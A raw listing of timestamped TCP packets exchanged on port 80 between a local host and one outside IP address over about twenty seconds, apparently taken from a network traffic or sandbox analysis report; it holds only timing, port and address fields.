                                                                                  Dec 21, 2024 10:02:45.312942028 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:45.313000917 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.313062906 CET4977480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.434017897 CET804977489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:45.441771984 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.468765020 CET4977480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.561441898 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:45.561517000 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.561671972 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.636080027 CET804977489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:45.681166887 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:45.911245108 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:46.027565956 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:46.030879974 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.030945063 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.147196054 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.147470951 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:46.147713900 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:46.267209053 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.352395058 CET804977489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.352472067 CET4977480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:46.499732971 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:46.619420052 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.619510889 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.619543076 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:46.941054106 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:47.155919075 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:47.242355108 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:47.452794075 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:47.524369955 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:47.593420982 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:47.764211893 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:47.929801941 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:47.929872990 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:47.930809021 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:48.052500010 CET804977889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:48.052983999 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:48.053129911 CET804977989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:48.053227901 CET4977880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:48.053263903 CET4977980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:48.053276062 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:48.053894997 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:48.183595896 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:48.407465935 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:48.530530930 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:48.530551910 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:48.530597925 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:49.437274933 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:49.655931950 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:49.672646046 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:49.765290022 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:49.821130037 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:49.821563959 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:49.941128016 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:49.941225052 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:49.941250086 CET804978589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:49.941339970 CET4978580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:49.941368103 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:50.060918093 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:50.296624899 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:50.416402102 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:50.416455984 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:50.416486025 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:51.318923950 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:51.374669075 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:51.552298069 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:51.593580008 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:51.773258924 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:51.773830891 CET4979480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:51.894105911 CET804979189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:51.894136906 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:51.894159079 CET4979180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:51.894212961 CET4979480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:51.894328117 CET4979480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.013832092 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.249752045 CET4979480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.250505924 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.251178026 CET4979480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.369499922 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.369596004 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.369630098 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.370069027 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.370143890 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.370276928 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.387581110 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.412095070 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.489794970 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.507209063 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.507282019 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.507416964 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.626909971 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.718543053 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.838287115 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.838326931 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.859112024 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.932315111 CET804979489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.932404995 CET4979480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:52.978842020 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.978897095 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:52.978926897 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:53.746490002 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:53.796555042 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:53.884541988 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:53.937175989 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:53.980130911 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:53.980467081 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.100012064 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.127334118 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.171636105 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.258661985 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.258908033 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.327996969 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.379374027 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.379446030 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.379646063 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.379829884 CET804979989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.379885912 CET4979980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.439095974 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447650909 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447664022 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447727919 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.447741032 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447814941 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.447815895 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447875977 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447879076 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.447916985 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.447928905 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.447967052 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.448029995 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.448044062 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.448067904 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.448081970 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.448112965 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.448154926 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.448174953 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.448187113 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.448242903 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.499083042 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567399979 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567414999 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567500114 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567501068 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.567569971 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567599058 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.567651033 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.567681074 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567759037 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.567799091 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567823887 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.567893028 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.568114042 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.568125963 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.568175077 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.568187952 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.568234921 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.616095066 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.616159916 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.687155008 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687252045 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.687402964 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687474966 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.687482119 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687536001 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687541008 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.687592030 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.687608957 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687668085 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.687674999 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687823057 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.687835932 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688033104 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688045979 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688154936 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688168049 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688314915 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688405037 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688417912 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688487053 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688559055 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688571930 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688680887 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688694000 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688838959 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688954115 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.688968897 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689022064 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689121962 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689135075 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689218998 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689230919 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689327002 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689338923 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689495087 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689574003 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689671993 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689685106 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689809084 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689821959 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.689925909 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.734133959 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:54.735788107 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.735857010 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.806935072 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.806986094 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807279110 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807292938 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807395935 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807451963 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807562113 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807574987 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807710886 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807833910 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807847023 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807858944 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.807926893 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.808079958 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.808118105 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.808130980 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.808195114 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.854778051 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.854790926 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:54.854804039 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:55.337810040 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:55.390300989 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:55.772752047 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:55.827802896 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:55.996344090 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.046545982 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.121309996 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.121584892 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.121617079 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.241111994 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.241178989 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.241271973 CET804979889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.241302013 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.241334915 CET4979880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.241755009 CET804980589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.241807938 CET4980580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.360862017 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.593498945 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:56.713630915 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.713654995 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:56.713691950 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:57.617976904 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:57.671721935 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:57.852189064 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:57.905924082 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:57.964606047 CET4981280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:58.084094048 CET804981289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:58.084180117 CET4981280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:58.084305048 CET4981280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:58.203855038 CET804981289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:58.437349081 CET4981280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:58.557039976 CET804981289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:58.557091951 CET804981289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:58.557128906 CET804981289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:58.984920979 CET4981280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:58.984983921 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.104732990 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.104810953 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.104954004 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.105422974 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.122163057 CET804981289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.122267962 CET4981280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.224466085 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.224912882 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.225024939 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.225178957 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.344717026 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.452874899 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.572599888 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.572616100 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.577898979 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:59.697606087 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.697618961 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:59.697671890 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:00.482969046 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:00.530916929 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:00.603161097 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:00.655929089 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:00.716202021 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:00.765311003 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:00.836214066 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:00.890330076 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:00.952058077 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:00.952074051 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:00.952378035 CET4982680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:01.072083950 CET804981989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:01.072163105 CET4981980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:01.072638988 CET804981889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:01.072690010 CET4981880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:01.072807074 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:01.072874069 CET4982680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:01.072997093 CET4982680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:01.192492962 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:01.421643972 CET4982680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:01.541260004 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:01.541282892 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:01.541342020 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:02.452472925 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:02.499665022 CET4982680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:02.684040070 CET804982689.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:02.734083891 CET4982680192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:02.816746950 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:02.936427116 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:02.936505079 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:02.936671019 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:03.056180000 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:03.291254044 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:03.411396980 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:03.411515951 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:03.411650896 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:04.310667038 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:04.359221935 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.544081926 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:04.593683004 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.666834116 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.667134047 CET4983380192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.789455891 CET804983389.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:04.789530993 CET4983380192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.789721012 CET4983380192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.789762020 CET804983289.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:04.789822102 CET4983280192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:04.909142017 CET804983389.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:05.140408993 CET4983380192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:05.260047913 CET804983389.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:05.260139942 CET804983389.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:05.260159016 CET804983389.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:05.719379902 CET4983980192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:05.719636917 CET4983380192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:03:05.839020014 CET804983989.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:03:05.839570045 CET804983389.23.96.180192.168.2.5
